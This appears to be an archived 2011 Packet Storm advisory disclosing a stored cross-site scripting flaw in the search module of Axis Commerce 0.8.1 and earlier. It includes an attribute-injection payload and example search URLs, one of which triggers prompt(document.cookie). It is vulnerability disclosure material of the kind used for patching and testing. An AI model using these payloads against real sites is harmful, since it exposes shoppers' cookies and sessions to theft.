Axis Commerce 0.8.1 Cross Site Scripting

2011-08-19T00:00:00
ID PACKETSTORM:104245
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-19T00:00:00

Description

                                        
                                            `# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip  
# Version: 0.8.1 and previus  
# Tested on: Apache (For Windows)  
  
ISSUE  
  
Vulnerable Modules => Search Module  
  
XSS can be done using the command input  
  
Example Code: " onmouseover=prompt(XSS Code) bad="  
  
Example:  
  
http://localhost/axis-0.7.0.4/search/result?q="   
onmouseover=prompt(906764) bad="  
  
http://localhost/axis-0.7.0.4/search/result?q="   
onmouseover=prompt(document.cookie) bad="  
  
  
Thanks,  
  
  
Eyüp ÇEL?K  
Bilgi Teknolojileri Güvenlik Uzman?  
http://www.eyupcelik.com.tr  
`